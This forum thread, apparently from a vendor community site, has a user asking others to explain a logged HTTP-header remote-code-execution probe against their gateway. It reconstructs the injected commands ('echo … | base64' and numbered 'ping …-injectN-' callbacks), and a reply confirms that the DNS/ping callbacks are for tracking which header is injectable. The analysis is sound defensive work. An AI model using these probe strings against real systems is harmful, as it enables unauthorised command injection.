Create a Post
Showing results for 
Search instead for 
Did you mean: 

http header remote code execution - help me learn

Hi everyone,


I hope someone cares to learn me what was tried in this http header remote code execution and that others also can learn from this analyze. 

Here is an example of the log:


The blurred info in the following image contains the external IP of my gateway:



Here is the capture opened in Wireshark: Notice that all the blurred fields contain the same external IP-address as above


So this is what I understand. 

echo aaaaaaaaaaa | base64   results to encoding the text aaa... to base64 which gives the result YWFhYWFhYWFhYWEK

So all these tests will result to these:

ping YWFhYWFhYWFhYWEK-inject1-(my external IP)

ping YWFhYWFhYWFhYWEK-inject2-(my external IP)

ping YWFhYWFhYWFhYWEK-inject3-(my external IP)

ping YWFhYWFhYWFhYWEK-inject4-(my external IP)


Since they use inject1, inject2, inject3 and inject4, does it mean they are trying to see which http header field it's possible to inject to? Meaning inject1 will mean it worked by using Cookie field? 

But maybe more important that they managed to run the code "echo aaaaaaaaaa | base64" on the system as a test for further/later attacks? And also by including the external IP-address that they know which servers on the Internet is vulnerable and pinging back to the domain


Maybe I'm tottaly wrong but I hope someone cares to explain. 



0 Kudos
2 Replies

Yes, they are trying to see which field they can inject arbitrary code into, with the different hostnames and pings resulting in an activity they can track.
I imagine they could log both the DNS lookup (something unique, so it would definitely go back to their name servers and not be cached) and the actual ping to determine the level of success (a potential exhilaration channel), and of course the IP.
And yes, if this code executes at all, that is an issue.


Thanks @PhoneBoy for confirming this. That's pretty clever of them I would say. I searched for the code online and found this website


Does it mean that the website was vulnerable for this specific attack? It's weird seeing it there as part of the website. In our case they used GET method. 

Edit1: I guess that it was only cached on the website, since HTTP GET method can be cached on the server side. At least they tried on this webiste too. 


0 Kudos